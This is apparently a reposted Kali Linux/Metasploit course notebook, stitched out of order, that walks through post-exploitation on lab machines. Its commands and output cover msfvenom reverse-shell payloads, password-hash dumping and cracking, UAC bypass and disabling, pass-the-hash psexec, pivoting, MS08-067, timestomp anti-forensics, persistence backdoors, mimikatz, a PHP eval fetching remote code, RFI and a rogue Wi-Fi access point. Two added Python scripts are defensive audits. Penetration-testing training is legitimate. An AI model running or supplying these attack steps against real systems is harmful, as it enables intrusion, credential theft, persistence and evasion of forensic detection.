    [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
    [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
    [*] Sniffing traffic.....
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/favicon.ico
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/dvwa/
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/dvwa/login.php
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/dvwa/dvwa/css/login.css
    [*] HTTP GET: 192.168.6.134:49162-192.168.6.1:80 http://192.168.6.1/dvwa/dvwa/images/login_logo.png
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/favicon.ico
    [*] HTTP GET: 192.168.6.134:49163-192.168.6.1:80 http://192.168.6.1/sqllib/
    [*] HTTP GET: 192.168.6.134:49163-192.168.6.1:80 http://192.168.6.1/sqllib/index.html_files/freemind2html.css
    [*] HTTP GET: 192.168.6.134:49164-192.168.6.1:80 http://192.168.6.1/sqllib/index.html_files/freemind2html.js
    [*] HTTP GET: 192.168.6.134:49163-192.168.6.1:80 http://192.168.6.1/sqllib/index.html_files/image.png
    [*] HTTP GET: 192.168.6.134:49164-192.168.6.1:80 http://192.168.6.1/sqllib/sql-connections/setup-db.php
    [*] Finished sniffing
    Interrupt: use the 'exit' command to quit
    

     

    10. Searching for files

    • search -f *.ini
    • search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

    11. Cracking weak passwords

    • Cracking weak passwords with John the Ripper

    - use post/windows/gather/hashdump # in a SYSTEM-level meterpreter
    - run # results are saved under /tmp
    - use auxiliary/analyze/jtr_crack_fast
    - run

    meterpreter > getsystem 
    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
    meterpreter > getuid 
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > background 
    [*] Backgrounding session 1...
    msf auxiliary(sniffer/psnuffle) > use post/windows/gather/hashdump 
    msf post(windows/gather/hashdump) > set session 1
    session => 1
    msf post(windows/gather/hashdump) > exploit 
    
    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY d547a11a1d5b60bbae251d356e192de0...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hints...
    
    vv:"vv"
    
    [*] Dumping password hashes...
    
    
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    vv:1000:aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8:::
    
    
    [*] Post module execution completed
    msf post(windows/gather/hashdump) > use auxiliary/analyze/jtr_crack_fast 
    
    msf auxiliary(analyze/jtr_crack_fast) > exploit 
    
    [*] Cracking nt hashes in incremental mode (Digits)...
    [*] Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
    [*] Remaining 1 password hash
    Press 'q' or Ctrl-C to abort, almost any other key for status
    0g 0:00:00:04 DONE (Mon Sep  3 21:50:07 2018) 0g/s 23052Kp/s 23052Kc/s 23052KC/s 73673953..73673952
    Session completed
    [*] Cracked Passwords this run:
    [+] vv:vv:1:1
    [+] vv:vv:4:4
    [+] vv:vv:1:1
    [+] vv:vv:4:4
    [*] Auxiliary module execution completed
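    As an added example (not the author's), a Python parser for the pwdump lines that hashdump prints above, with an audit built on two well-known constants: an LM field of `aad3b435b51404eeaad3b435b51404ee` means no LM hash is stored, and an NT field of `31d6cfe0d16ae931b73c59d7e0c089c0` is the hash of an empty password. The sample dump is copied from the transcript above; the reuse check and messages are this example's own.

```python
"""Audit a pwdump-format hash dump (user:RID:LM:NT:::) for weak account state.

Added example. Blank-password and LM findings rest on two well-known hash
constants; an NT hash shared by two accounts means the same password is set on
both. Whether an account is enabled is not visible here (Guest and the built-in
Administrator are disabled by default on Windows 7), so check that separately.
"""
import re
from typing import Dict, List, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


class Account(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text: str) -> List[Account]:
    """Keep only well-formed hash lines; hint and status lines are ignored."""
    accounts: List[Account] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append(Account(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts


def audit(accounts: List[Account]) -> Dict[str, List[str]]:
    """Return {user: findings} for accounts whose stored hashes indicate weak state."""
    report: Dict[str, List[str]] = {}
    by_nt: Dict[str, List[str]] = {}
    for a in accounts:
        found: List[str] = []
        if a.nt == EMPTY_NT:
            found.append("blank password")
            if a.rid == 500:
                found.append("built-in Administrator (RID 500) with blank password")
        else:
            by_nt.setdefault(a.nt, []).append(a.user)
        if a.lm != EMPTY_LM:
            found.append("LM hash stored (LM hashing still enabled, trivially crackable)")
        if found:
            report[a.user] = found
    # Identical NT hashes on different accounts: the same password is reused.
    for users in by_nt.values():
        if len(users) > 1:
            for u in users:
                others = sorted(set(users) - {u})
                report.setdefault(u, []).append(f"password shared with {others}")
    return report


# Sample copied from the hashdump transcript above (hint line included to show
# that non-hash lines are skipped).
SAMPLE_DUMP = """
[*] Dumping password hints...

vv:"vv"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vv:1000:aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8:::
"""

if __name__ == "__main__":
    for user, findings in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{user}: {'; '.join(findings)}")
```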
    

    12. Covering tracks

    • File system access leaves traces, which are the main focus of digital forensics
    • Penetration testers and attackers often want to destroy traces of file system access
    • The best way to avoid forensic discovery: do not touch the file system

      • This is meterpreter's inherent advantage (entirely memory-based)
    • MAC times (Modified / Accessed / Changed)

      • ls -l --time=atime/mtime/ctime 1.txt
      • stat 1.txt
      • touch -d "2 days ago" 1.txt
      • touch -t 1501010101 1.txt
    • MACE: MFT entry

      • MFT: the Master File Table of the NTFS file system
      • Usually 1024 bytes or two disk sectors, holding several entries
      • Contains a large amount of file information (size, name, directory location, disk location, creation date)
      • For more, study file system forensic analysis techniques
    • Timestomp (meterpreter)

      • timestomp -v 1.txt
      • timestomp -f c:\autoexec.bat 1.txt
        -b -r # erase the MACE time information; this option is currently broken
      • -m / -a / -c / -e / -z
    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2018-09-04 10:58:47 +0800
    Accessed      : 2018-09-04 10:58:37 +0800
    Created       : 2018-09-04 10:58:37 +0800
    Entry Modified: 2018-09-04 10:58:47 +0800
    meterpreter > timestomp -m "03/11/2019 22:22:22" 1.txt
    [*] Setting specific MACE attributes on 1.txt
    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2019-03-11 22:22:22 +0800
    Accessed      : 2018-09-04 10:58:37 +0800
    Created       : 2018-09-04 10:58:37 +0800
    Entry Modified: 2018-09-04 10:58:47 +0800
    

     

    timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt

    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2018-09-04 10:58:47 +0800
    Accessed      : 2018-09-04 10:58:37 +0800
    Created       : 2018-09-04 10:58:37 +0800
    Entry Modified: 2018-09-04 10:58:47 +0800
    
    meterpreter > timestomp -z "03/11/2019 22:22:22" 1.txt
    [*] Setting specific MACE attributes on 1.txt
    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2019-03-11 22:22:22 +0800
    Accessed      : 2019-03-11 22:22:22 +0800
    Created       : 2019-03-11 22:22:22 +0800
    Entry Modified: 2019-03-11 22:22:22 +0800
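    Added example, not part of the original post: a Python check that reads the `timestomp -v` listings above and reports the inconsistencies a forensic analyst would look for, with the three listings from the transcript embedded as sample data. The observation time handed to the future-date check is an assumption.

```python
"""Spot timestomped files from `timestomp -v` listings.

Added example. The first two checks are classic forensic heuristics on the
$STANDARD_INFORMATION times; the third needs the time at which the listing was
taken (assumed and passed in by the caller).
"""
import re
from datetime import datetime
from typing import Dict, List, Optional

FIELDS = ("Modified", "Accessed", "Created", "Entry Modified")
LINE_RE = re.compile(r"^(Modified|Accessed|Created|Entry Modified)\s*:\s*(\S+ \S+ [+-]\d{4})\s*$")


def parse_timestamp(text: str) -> datetime:
    """Parse 'YYYY-MM-DD HH:MM:SS +ZZZZ' as printed by timestomp."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S %z")


def parse_mace(listing: str) -> Dict[str, datetime]:
    """Parse the four timestamp lines of one file; raise if any is missing."""
    mace: Dict[str, datetime] = {}
    for line in listing.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            mace[m.group(1)] = parse_timestamp(m.group(2))
    missing = [f for f in FIELDS if f not in mace]
    if missing:
        raise ValueError(f"incomplete MACE listing, missing {missing}")
    return mace


def mace_findings(mace: Dict[str, datetime],
                  observed_at: Optional[datetime] = None) -> List[str]:
    """Return the inconsistencies in one file's MACE set (empty = nothing odd)."""
    findings: List[str] = []
    entry = mace["Entry Modified"]
    # Normal file operations that touch M, A or C also update the MFT entry
    # time, so a value newer than Entry Modified was written directly.
    for name in ("Modified", "Accessed", "Created"):
        if mace[name] > entry:
            findings.append(f"{name} is newer than Entry Modified")
    # A blanket rewrite (timestomp -z) leaves all four equal to the second;
    # genuine activity almost never produces that.
    if len(set(mace.values())) == 1:
        findings.append("all four timestamps identical")
    if observed_at is not None:
        for name in FIELDS:
            if mace[name] > observed_at:
                findings.append(f"{name} lies in the future relative to observation")
    return findings


# The three listings from the transcript above (before, after -m, after -z).
ORIGINAL = """
Modified      : 2018-09-04 10:58:47 +0800
Accessed      : 2018-09-04 10:58:37 +0800
Created       : 2018-09-04 10:58:37 +0800
Entry Modified: 2018-09-04 10:58:47 +0800
"""
AFTER_M = """
Modified      : 2019-03-11 22:22:22 +0800
Accessed      : 2018-09-04 10:58:37 +0800
Created       : 2018-09-04 10:58:37 +0800
Entry Modified: 2018-09-04 10:58:47 +0800
"""
AFTER_Z = """
Modified      : 2019-03-11 22:22:22 +0800
Accessed      : 2019-03-11 22:22:22 +0800
Created       : 2019-03-11 22:22:22 +0800
Entry Modified: 2019-03-11 22:22:22 +0800
"""
# Assumed time the listings were taken (shortly after the original listing).
SAMPLE_OBSERVED = parse_timestamp("2018-09-04 11:00:00 +0800")

if __name__ == "__main__":
    for label, listing in (("original", ORIGINAL), ("after -m", AFTER_M), ("after -z", AFTER_Z)):
        print(label, mace_findings(parse_mace(listing), SAMPLE_OBSERVED) or "no findings")
```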
    

     

    13. Pivoting (jump host / pivot point)

    • Build the payload with msfvenom
      msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b "\x00\xff" -e x86/shikata_ga_nai -f exe -o payload.exe
    • Obtain SYSTEM privileges

    • KALI:1.1.1.10

    • MONO1:  EM1: 1.1.1.1   EM2: 192.168.155.8

    • MONO2:  EM1: 2.1.1.1   EM2: 192.168.155.9

    • WIN7: 2.1.1.10

    • XP:  2.1.1.11

     

    • Use an already-controlled computer as a jump host into the internal network

    • To the other internal hosts, all access appears to come from the jump host
    • run autoroute -s 2.1.1.0/24 # the target's internal subnet, which cannot reach the outside

    • meterpreter > run autoroute -s 2.1.1.0/24
      [*] Adding a route to 2.1.1.0/255.255.255.0...
      [+] Added route to 2.1.1.0/255.255.255.0 via 192.168.155.9
      [*] Use the -p option to list all active routes
      meterpreter > run autoroute -p
      
      Active Routing Table
      ====================
      
         Subnet             Netmask            Gateway
         ------             -------            -------
         2.1.1.0            255.255.255.0      Session 1
      

       

    • Auto-routing in a realistic scenario

      • Use the Win7 host to attack the internal XP host (compare the cases where XP does and does not have outside network access)
        - Scan the internal network: use auxiliary/scanner/portscan/tcp
      • msf exploit(handler) > use auxiliary/scanner/portscan/tcp 
        
        msf auxiliary(tcp) > set rhosts 2.1.1.9-2.1.1.12
        rhosts => 2.1.1.9-2.1.1.12
        msf auxiliary(tcp) > set ports 139,445
        ports => 139,445
        
        msf auxiliary(tcp) > options 
        
        Module options (auxiliary/scanner/portscan/tcp):
        
           Name         Current Setting   Required  Description
           ----         ---------------   --------  -----------
           CONCURRENCY  10                yes       The number of concurrent ports to check per host
           PORTS        139,445           yes       Ports to scan (e.g. 22-25,80,110-900)
           RHOSTS       2.1.1.9-2.1.1.12  yes       The target address range or CIDR identifier
           THREADS      1                 yes       The number of concurrent threads
           TIMEOUT      1000              yes       The socket connect timeout in milliseconds
        
        msf auxiliary(tcp) > run 
        
        [*] Scanned 1 of 4 hosts (25% complete)
        [*] 2.1.1.10:139 - TCP OPEN
        [*] 2.1.1.10:445 - TCP OPEN
        [*] Scanned 2 of 4 hosts (50% complete)
        [*] 2.1.1.11:139 - TCP OPEN
        [*] 2.1.1.11:445 - TCP OPEN
        [*] Scanned 3 of 4 hosts (75% complete)
        [*] Scanned 4 of 4 hosts (100% complete)
        [*] Auxiliary module execution completed
        

         

    • Pivoting via port forwarding: portfwd

      • Use the compromised computer to forward ports between Kali and the attack target
      • portfwd add -L LIP -l LPORT -r RIP -p RPORT
      • portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
      • portfwd list / delete / flush
    • Get a shell on XP

    • use exploit/windows/smb/ms08_067_netapi   (a firewall rule must be added on Win7, bypassing UAC, to allow Win7 and XP to communicate)

      • Without the firewall rule, the result is as shown in the figure below

      • msf auxiliary(tcp) > use exploit/windows/smb/ms08_067_netapi   
        msf exploit(ms08_067_netapi) > options 
        
        msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(ms08_067_netapi) > options 
        
        Module options (exploit/windows/smb/ms08_067_netapi):
        
           Name     Current Setting  Required  Description
           ----     ---------------  --------  -----------
           RHOST                     yes       The target address
           RPORT    445              yes       Set the SMB service port
           SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
        
        
        Payload options (windows/meterpreter/reverse_tcp):
        
           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST                      yes       The listen address
           LPORT     4444             yes       The listen port
        
        
        Exploit target:
        
           Id  Name
           --  ----
           0   Automatic Targeting
        
        
        msf exploit(ms08_067_netapi) > set lhost 2.1.1.10
        lhost => 2.1.1.10
        msf exploit(ms08_067_netapi) > set rhost 2.1.1.11
        rhost => 2.1.1.11
        msf exploit(ms08_067_netapi) > exploit 
        
        [*] Started reverse handler on 2.1.1.10:4444 via the meterpreter on session 1
        [*] Automatically detecting the target...
        [*] Sending stage (957487 bytes)
        [*] Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
        [*] Selected Target: Windows XP SP3 Chinese - Traditional (NX)
        [*] Attempting to trigger the vulnerability...
        [*] Meterpreter session 2 opened (1.1.1.10-192.168.155.5:4444 -> 2.1.1.11:1040) at 2018-09-05 13:50:55 +0800
        
        meterpreter > 
        

         

    • use exploit/multi/handler
      • set exitonsession false   # keep listening on port 4444 after a session is established

    14. POST modules

    • meterpreter >

    # Host discovery

    • run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24 
    meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.56.0/24
    
    [*] Running module against VV-59439F0BD59B
    [*] ARP Scanning 192.168.56.0/24
    [*] 	IP: 192.168.56.1 MAC 0a:00:27:00:00:12 (UNKNOWN)
    [*] 	IP: 192.168.56.101 MAC 08:00:27:71:23:c2 (CADMUS COMPUTER SYSTEMS)
    [*] 	IP: 192.168.56.102 MAC 08:00:27:05:ea:53 (CADMUS COMPUTER SYSTEMS)
    [*] 	IP: 192.168.56.103 MAC 08:00:27:1d:39:73 (CADMUS COMPUTER SYSTEMS)
    [*] 	IP: 192.168.56.100 MAC 08:00:27:85:be:3e (CADMUS COMPUTER SYSTEMS)
    

     

    # Check whether the target is a virtual machine

    • run post/windows/gather/checkvm   
    meterpreter > run post/windows/gather/checkvm
    
    [*] Checking if VV-59439F0BD59B is a Virtual Machine .....
    [*] This is a Sun VirtualBox Virtual Machine
    

     

    # Dump account password hashes and token information

    • run post/windows/gather/credentials/credential_collector 
    meterpreter > run post/windows/gather/credentials/credential_collector
    
    [*] Running module against VV-59439F0BD59B
    [+] Collecting hashes...
        Extracted: Administrator:b7eab2f3aad8ad3daad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8
        Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        Extracted: HelpAssistant:28b6a6df4f20e81455e41330c1a79c70:0f7d49c7900cdf2bc7b2b12b65678e34
        Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:0d9b1a742628418754aaf0ffd8d88816
        Extracted: vv:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    [+] Collecting tokens...
        NT AUTHORITY\LOCAL SERVICE
        NT AUTHORITY\NETWORK SERVICE
        NT AUTHORITY\SYSTEM
        VV-59439F0BD59B\vv
        NT AUTHORITY\ANONYMOUS LOGON
    

     

    # Enumerate the applications installed on the target host

    • run post/windows/gather/enum_applications 
    meterpreter > run post/windows/gather/enum_applications
    
    [*] Enumerating applications installed on VV-59439F0BD59B
    
    Installed Applications
    ======================
    
     Name                                         Version
     ----                                         -------
     Oracle VM VirtualBox Guest Additions 5.2.12  5.2.12.0
     WebFldrs XP                                  9.50.7523
    
    

     

    # List the currently logged-on and recently logged-on users

    • run post/windows/gather/enum_logged_on_users
    meterpreter > run post/windows/gather/enum_logged_on_users
    
    [*] Running against session 1
    
    Current Logged Users
    ====================
    
     SID                                          User
     ---                                          ----
     S-1-5-21-606747145-920026266-854245398-1003  VV-59439F0BD59B\vv
    
    
    [*] Results saved in: /root/.msf5/loot/20180905175410_default_192.168.56.101_host.users.activ_302529.txt
    
    Recently Logged Users
    =====================
    
     SID                                          Profile Path
     ---                                          ------------
     S-1-5-18                                     %systemroot%\system32\config\systemprofile
     S-1-5-19                                     %SystemDrive%\Documents and Settings\LocalService
     S-1-5-20                                     %SystemDrive%\Documents and Settings\NetworkService
     S-1-5-21-606747145-920026266-854245398-1003  %SystemDrive%\Documents and Settings\vv
    

     

    # Enumerate SNMP

    • run post/windows/gather/enum_snmp 

    # Delete a specified account

    • run post/windows/manage/delete_user USERNAME=yuanfh

    # Check which local privilege-escalation exploit modules are usable on this host

    • run post/multi/recon/local_exploit_suggester  
    meterpreter > run post/multi/recon/local_exploit_suggester  
    
    [*] 192.168.56.101 - Collecting local exploits for x86/windows...
    [*] 192.168.56.101 - 31 exploit checks are being tried...
    [+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
    [+] 192.168.56.101 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
    [+] 192.168.56.101 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
    [+] 192.168.56.101 - exploit/windows/local/ms_ndproxy: The target appears to be vulnerable.
    [+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
    

     

    # View the target's environment variables

    • run post/multi/gather/env 
    meterpreter > run post/multi/gather/env
    
    APPDATA=C:\Documents and Settings\vv\Application Data
    CLIENTNAME=Console
    ComSpec=C:\WINDOWS\system32\cmd.exe
    FP_NO_HOST_CHECK=NO
    HOMEDRIVE=C:
    HOMEPATH=\Documents and Settings\vv
    LOGONSERVER=\\VV-59439F0BD59B
    NUMBER_OF_PROCESSORS=1
    OS=Windows_NT
    PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
    PROCESSOR_ARCHITECTURE=x86
    PROCESSOR_IDENTIFIER=x86 Family 6 Model 60 Stepping 3, GenuineIntel
    PROCESSOR_LEVEL=6
    PROCESSOR_REVISION=3c03
    Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
    SESSIONNAME=Console
    TEMP=C:\DOCUME~1\vv\LOCALS~1\Temp
    TMP=C:\DOCUME~1\vv\LOCALS~1\Temp
    windir=C:\WINDOWS
    

    # Retrieve the credentials stored in Firefox

    • run post/multi/gather/firefox_creds 

    # Retrieve SSH credential ciphertext and certificate information

    • run post/multi/gather/ssh_creds  

    # Check whether a specified program on the target host is malware

    • run post/multi/gather/check_malware REMOTEFILE=c:\a.exe  
    • run hostsedit -e 1.1.1.1,www.baidu.com
    • migrate -N explorer.exe
    • run [tab] [tab]
    • run winenum

    • Auto-run meterpreter scripts (run automatically once the meterpreter session is established; InitialAutoRunScript runs before AutoRunScript hostsedit)

      • set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
      • set InitialAutoRunScript checkvm
    • Auto-run post modules

      • set InitialAutoRunScript migrate -n explorer.exe
      • set AutoRunScript post/windows/gather/dumplinks   # dump recent documents

    15. Persistent backdoors

    • A meterpreter obtained through an exploit runs in memory only and is lost on reboot
    • Re-exploiting the vulnerability may crash the service
    • A persistent backdoor keeps remote control even after the vulnerability has been patched

    • meterpreter backdoor (metsvc)

      • run metsvc -A # remove with -r
      • use exploit/multi/handler
      • set PAYLOAD windows/metsvc_bind_tcp
      • set LPORT 31337
      • set RHOST 1.1.1.1
    • Persistent backdoor (persistence script)

      • run persistence -h
      • run persistence -X -i 10 -p 4444 -r 10.0.0.128
      • run persistence -U -i 20 -p 4444 -r 10.0.0.128
      • run persistence -S -i 20 -p 4444 -r 10.0.0.128

    16. Extended msf usage: mimikatz

    • hashdump itself uses part of mimikatz's functionality
      • getsystem
      • load mimikatz
      • wdigest / kerberos / msv / ssp / tspkg / livessp
      • mimikatz_command -h
      • mimikatz_command -f a::
      • mimikatz_command -f samdump::hashes
      • mimikatz_command -f handle::list
      • mimikatz_command -f service::list
      • mimikatz_command -f crypto::listProviders
      • mimikatz_command -f winmine::infos # the Minesweeper game

    17. Code-execution vulnerabilities

    • PHP shell

      • msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
      • Start the listener in msf
      • Upload it to the web site and access it through a browser
    • Web Delivery

      • Use the code-execution vulnerability to fetch the payload from the attacker's server
      • use exploit/multi/script/web_delivery
      • set target 1
      • run
      • php -d allow_url_fopen=true -r "eval(file_get_contents('http://1.1.1.1/fTYWqmu'));"

    18. RFI (remote file inclusion)

    • vi /etc/php5/cgi/php.ini
      • allow_url_fopen = On
      • allow_url_include = On
    • use exploit/unix/webapp/php_include
    • set RHOST 1.1.1.2
    • set PATH /dvwa/vulnerabilities/fi/
    • set PHPURI /?page=XXpathXX
    • set HEADERS "Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
    • set payload php/meterpreter/reverse_tcp
    • set lhost 1.1.1.1
    • exploit

    19. Karmetasploit

    • Fake AP, password sniffing, data interception, browser attacks
    • Multi-exploit resource file: wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

    • Install the other dependencies

      • gem install activerecord sqlite3-ruby
    • Install and configure the infrastructure

      • apt-get install isc-dhcp-server
      • cat /etc/dhcp/dhcpd.conf
        option domain-name-servers 10.0.0.1;
        default-lease-time 60;
        max-lease-time 72;
        ddns-update-style none;
        authoritative;
        log-facility local7;
        subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
        }
    • Fake AP

      • airmon-ng start wlan0
      • airbase-ng -P -C 30 -e "FREE" -v wlan0mon
      • ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
      • touch /var/lib/dhcp/dhcpd.leases
      • dhcpd -cf /etc/dhcp/dhcpd.conf at0
    • Start Karmetasploit

      • msfconsole -q -r karma.rc_.txt
    • Allow users to browse the Internet normally

    • Start Karmetasploit

      • msfconsole -q -r karma.rc_.txt
    • Add routing and firewall rules

      • echo 1 > /proc/sys/net/ipv4/ip_forward
      • iptables -P FORWARD ACCEPT
      • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    posted on 2018-09-05 19:06 E11iot

    Reposted from: https://www.cnblogs.com/E11iot/p/9594396.html

    This post records in detail the process of learning Kali Linux 2018.1 and using it for penetration testing; the tutorial is the "Kali Linux Penetration Testing" course on 安全牛课堂

    Kali Linux Penetration Testing (苑房弘) blog notes

    1. Preparation

    • Expanding the foothold after control of the target system has been obtained

      • Privilege escalation
      • Information gathering
      • Penetrating the internal network
      • Permanent backdoor
    • Expanding the foothold from an existing session

      • msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o payload.exe
    • Listen on Kali

      msf > use exploit/multi/handler
      msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
      msf exploit(multi/handler) > set LHOST 10.0.0.128
      msf exploit(multi/handler) > exploit -j
      
    • Run payload.exe on the Windows system

    • Enter meterpreter on Kali

      msf exploit(multi/handler) > sessions 
      
      Active sessions
      ===============
      
        Id  Name  Type                     Information             Connection
        --  ----  ----                     -----------             ----------
        1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
      
      msf exploit(multi/handler) > sessions 
      
      Active sessions
      ===============
      
        Id  Name  Type                     Information             Connection
        --  ----  ----                     -----------             ----------
        1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
      
      msf exploit(multi/handler) > sessions -i 1
      [*] Starting interaction with 1...
      
      meterpreter > getuid
      Server username: WIN7-VM\John
      

    2. Obtaining system account privileges

    • Privilege escalation fails, usually because of UAC restrictions

      meterpreter > getuid
      Server username: WIN7-VM\John
      meterpreter > load priv
      [-] The 'priv' extension has already been loaded.
      meterpreter > getsystem 
      [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
      [-] Named Pipe Impersonation (In Memory/Admin)
      [-] Named Pipe Impersonation (Dropper/Admin)
      [-] Token Duplication (In Memory/Admin)
      
      
      meterpreter > background
      
    • Bypass UAC restrictions

      • use exploit/windows/local/ask

        use exploit/windows/local/ask
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        set FILENAME win_update.exe
        set SESSION 1
        exploit
        

        meterpreter > getsystem
        meterpreter > getuid
        

      • use exploit/windows/local/bypassuac

        use exploit/windows/local/bypassuac
        set SESSION 1
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        show targets
        exploit
        

      • use exploit/windows/local/bypassuac_injection

        use exploit/windows/local/bypassuac_injection
        set SESSION 1
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

    • Escalate directly to system through a vulnerability

      • use exploit/windows/local/ms13_053_schlamperei

        use exploit/windows/local/ms13_053_schlamperei
        set SESSION 1
        

      • use exploit/windows/local/ms13_081_track_popup_menu

        use exploit/windows/local/ms13_081_track_popup_menu
        set SESSION 1
        exploit
        

      • use exploit/windows/local/ms13_097_ie_registry_symlink

        use exploit/windows/local/ms13_097_ie_registry_symlink
        set SESSION 1
        set URIPATH /
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        set SRVHOST 10.0.0.128
        exploit
        
      • use exploit/windows/local/ppr_flatten_rec

        use exploit/windows/local/ppr_flatten_rec
        set SESSION 1
        exploit
        

    • Graphical (VNC) payload

      • set payload windows/vncinject/reverse_tcp

        use exploit/windows/local/ppr_flatten_rec
        set payload windows/vncinject/reverse_tcp
        set SESSION 1
        set LHOST 10.0.0.128
        set ViewOnly false
        exploit
        

    • Disabling UAC

      • Get the hashdump

        meterpreter > hashdump
            Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        
      • Attempt to exploit

        use exploit/windows/smb/psexec
        set RHOST 10.0.0.132
        set SMBUser John
        set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

        Error: Exploit failed [no-access]

      • UAC must be disabled first

        sessions -i 2
        shell
        cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
        shutdown -r -t 0
        

      • Exploit again

